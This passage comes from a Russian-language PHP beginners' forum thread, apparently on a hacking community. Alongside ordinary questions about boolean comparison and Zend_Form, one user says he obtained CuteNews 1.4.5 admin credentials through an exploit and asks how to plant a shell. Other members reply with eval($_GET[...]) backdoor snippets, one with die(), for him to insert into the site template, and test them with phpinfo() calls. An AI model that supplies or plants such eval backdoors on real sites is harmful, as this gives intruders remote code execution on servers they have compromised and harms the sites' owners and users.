[php] Новичкам: задаем вопросы

Discussion in 'PHP' started by _Great_, 26 May 2007.

Thread Status:
Not open for further replies.
  1. Darkweider

    Darkweider Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    142
    Likes Received:
    13
    Reputations:
    0
    А ты с бесплатного хостинга запускаешь или на своей тачке или на своем хостинге... ? Просто на бесплатных в большинстве сокеты не поддерживаются) Что-то вроде не могу найти ошибку... А сам писал регер или по аналогии с другими делал?
     
  2. Zircool

    Zircool Elder - Старейшина

    Joined:
    1 Mar 2006
    Messages:
    162
    Likes Received:
    37
    Reputations:
    5
    Скрипт сам писал..... тестил на денвере 3 с компа.... сокеты держит ....
     
  3. presidentua

    presidentua милиционер Античата

    Joined:
    4 Nov 2007
    Messages:
    305
    Likes Received:
    236
    Reputations:
    15
    инересная ситуация с ПХП.

    $str1='true';
    $str2='asdfasdf asdf';
    if ($str1==$str2) ...

    все знают что вернет условие ФАЛСЕ, если же написать
    $str1=true; (без кавычек), но вернет ТРУЕ. Это тоже надеюсь все знают.

    Но такой момент, при передаче скрипту ГЕТ или других параметров со значением ТРУЕ ПХП интерпритирует значение ТРУЕ как строку, тоесть типа так $str1='true';

    А как можна передать (если вообще можна) параметры, чтобы интерпритировало как логическое значение типа так $str1=true.
     
  4. ToniKapuchon

    ToniKapuchon Elder - Старейшина

    Joined:
    26 Feb 2006
    Messages:
    153
    Likes Received:
    45
    Reputations:
    -1
  5. presidentua

    presidentua милиционер Античата

    Joined:
    4 Nov 2007
    Messages:
    305
    Likes Received:
    236
    Reputations:
    15
    неа, 1,0,труе,фалсе, большими буквами, маленькими, ничего не пододит, поэтому и обратился. Может как-то можна обойти это. Например черезразные хеши переменных, может как-то они по другому пишутся. Тоесть по сути ТРУЕ и ФАЛСЕ где-то определены как константы, но кто-его знает...
     
  6. 6u4yxa

    6u4yxa New Member

    Joined:
    16 Nov 2007
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Всем участникам приветы!
    хотел вот спросить ибо уже сломал се моск.... =(
    по моему вопросу в одной из тем мне посоветовали "Eval'лить код или поставь форму на закачку шела". Ушел в статьи и на php.ru (прошла неделя - голова как воздушный шарик)
    Тоесть как я понял в eval можно загнать пхп код - смысл етого я не пойму?
    На примере cutenews 1.4.5 на котором через эксплойт дабыл логин пароль админа -
    в теплейтах нельзя исполнлить пхп код, он его не воспринимает и не выводит (заметил что если вставить пхп код то после повторного просмотра долбаный кут ньюз удаляет из кода все введене переменые)
    Вот как бы и сам вопрос: объяснити для чего нужен етот eval, как и пользоваться и если есть желание помочь опишите, как мне залить шел в cutenews 1.4.5 имея админские привелегии?
     
  7. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    presidentua,

    PHP:
    <?php
    eval($_GET['xek']);
    $str2='asdfasdf asdf';
    if (
    $str1 == $str2) echo 1;
    ?>
    Естественно это не безопасно

    index.php?xek=$str1=true;
     
  8. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    6u4yxa, пример

    PHP:
    <?php
    eval($_GET['sekas']);
    ?>
    Обратись к скрипту так: script.php?sekas=phpinfo();
     
  9. 6u4yxa

    6u4yxa New Member

    Joined:
    16 Nov 2007
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    после того как занес ето в теплейт вылезло вот ето

    Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING
     
  10. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Я про скрипт говорил, а не про темплейт)
    http://php.net/eval
     
  11. 6u4yxa

    6u4yxa New Member

    Joined:
    16 Nov 2007
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    про евал уже все что можно прочитал но не могу все равно понять зачем он нужен...
    А на счет теплейта как реализовать php код там?

    _____________________

    попробовал тот код из примера работает =) выводит phpinfo(); но яж могу и без всякого eval его вывести.

    _____________________
    прошло ещё 10 мин...
    вставил в темплейт вот так:

    <?
    eval($GET['sekas']);
    ?>

    вылезла ошибка...

    посидел, подумал..

    вставил в темплейт вот так:

    <?
    eval(\"$GET['sekas']\"\);
    ?>

    смотрю ошибки нету... (думаю получилось)...

    пробую...

    http://localhost/cute/show_news.php?sekas=phpinfo();

    ........(мат) просто отобразил последние новости без phpinfo(); - в чем загвостка?
     
    #2551 6u4yxa, 3 Apr 2008
    Last edited: 3 Apr 2008
  12. alx8787

    alx8787 Elder - Старейшина

    Joined:
    16 Dec 2007
    Messages:
    47
    Likes Received:
    6
    Reputations:
    -12
    Доброго времени суток))

    Очень срочно надо научиться пользоваться скриптами!!!

    НАУЧИТЕ ПЛИЗЬЬЬ!!!

    Пишите как для чайника!!! Я новичёк!
     
    1 person likes this.
  13. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    работа в гугле тебе поможет так и пиши "как пользоваться скриптами" или там работа с php скриптами. читай маны и все поймешь
     
  14. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12

    тема поднималась на предыдущих страницах смотри внимательнее
     
  15. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    6u4yxa
    ты в пхп код вставил
    ? если да, то надо просто eval($_GET['sekas']);
     
  16. 6u4yxa

    6u4yxa New Member

    Joined:
    16 Nov 2007
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    я в темплейт ето вставляю, но если вставить без <? ?> то он отоброжает не код пхп а все ету строчку
     
  17. 6u4yxa

    6u4yxa New Member

    Joined:
    16 Nov 2007
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    плиз тыкни носом я просто с оченннннь отдаленого города и у нас инет просто ДЕБИЛ в плане тормаза и траф дороговатый =) да и страниц тут уже 260 =)

    ____________

    дошел до 245 не че не нашел то, что мне помогло бы =(((
     
    #2557 6u4yxa, 3 Apr 2008
    Last edited: 3 Apr 2008
  18. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Попробуй <?php
    eval($_GET['sekas']);die();
    ?>
     
  19. 6u4yxa

    6u4yxa New Member

    Joined:
    16 Nov 2007
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    издеваешься =(
     
  20. Дикс

    Дикс Elder - Старейшина

    Joined:
    16 Apr 2006
    Messages:
    1,194
    Likes Received:
    227
    Reputations:
    26
    парюсь с zend framework
    создал форму Zend_Form, делаю isValid() и он возвращает либо тру, либо фальс.
    А как получить текст ошибок?
     
Thread Status:
Not open for further replies.